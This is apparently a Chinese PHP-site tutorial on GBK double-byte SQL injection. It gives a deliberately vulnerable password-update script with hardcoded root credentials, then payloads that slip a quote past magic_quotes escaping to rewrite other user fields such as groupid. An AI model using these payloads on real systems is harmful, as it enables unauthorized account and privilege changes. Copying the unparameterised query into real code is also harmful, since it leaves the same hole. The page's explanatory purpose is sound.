双字节编码绕PHP单引号转义又一例： SQL UPDATE注入-自学php网

双字节编码绕PHP单引号转义又一例： SQL UPDATE注入

来源：自学PHP网时间：2015-04-17 14:47 作者：阅读:次

[导读] 原理和《利用双字节编码突破PHP单引号转义限制进行SQL注入》是一样的。view plaincopy to clipboardprint??php// by redice 2010.10.21// 连接mysql数据库$conn=0;$conn = mysql_connect(localhost......

原理和《利用双字节编码突破PHP单引号转义限制进行SQL注入》是一样的。

view plaincopy to clipboardprint?
<?php

// by redice 2010.10.21

// 连接mysql数据库
$conn=0;
$conn = mysql_connect("localhost","root","redice2009");
if (!$conn)
{
die("不能打开数据库连接，错误: " . mysql_error());
}

// 选择数据库
mysql_select_db("test", $conn);

// 设置mysql数据库输出数据的字符集
mysql_query("set names 'gbk'");

// 修改密码过程

$newpass=$_REQUEST[p];

$sql = "update user set pass='$newpass' where name='redice'";
echo "执行的查询=".$sql."</br>";

if(!mysql_query($sql,$conn))
{

    echo mysql_error();
}

?>

<?php

// by redice 2010.10.21

// 连接mysql数据库
$conn=0;
$conn = mysql_connect("localhost","root","redice2009");
if (!$conn)
{
die("不能打开数据库连接，错误: " . mysql_error());
}

// 选择数据库
mysql_select_db("test", $conn);

// 设置mysql数据库输出数据的字符集
mysql_query("set names 'gbk'");

// 修改密码过程

$newpass=$_REQUEST[p];

$sql = "update user set pass='$newpass' where name='redice'";
echo "执行的查询=".$sql."</br>";

if(!mysql_query($sql,$conn))
{

echo mysql_error();
}

（1）在gpc=off的情况下。

提交p=123',groupid='1 SQL语句变为：

update user set pass='123',groupid='1' where name='redice'

（2）在gpc=on的情况下。

利用GBK双字节编码，可以绕过单引号转义。

分析如下：

提交p=123%d5',groupid=1 where id=1%23

经浏览器url编码后为：

p=123%d5%27,groupid=1%20where%20id=1%23

再经PHP url解码后为：

p=1230xd50x27,groupid=10x20where0x20id=10x23

再经PHP转义后为（在0x27前插入0x5c）：

p=1230xd50x5c0x27,groupid=10x20where0x20id=10x23

由于服务端采用gbk编码连接数据库（set names 'gbk'），因此上述字节序列被MySQL作为GBK字符理解后即为：

p=123誠',groupid=1 where id=1#

PS：0xd50x5c 对应了汉字誠，从而吃掉了单引号，绕过转义

最终SQL语句变为：

update user set pass='123誠',groupid=1 where id=1#' where name='redice'

PS：%23解码后为#，用以注释之后的SQL语句，使之符合语法规范。

77种XSS跨站脚本攻击总结 - 网站安全 - 自学php

老文赏：SQL注入思路与手工猜解大进阶 - 网站安

子栏目

双字节编码绕PHP单引号转义又一例： SQL UPDATE注入

最新评论

添加评论

更多文章推荐

添加评论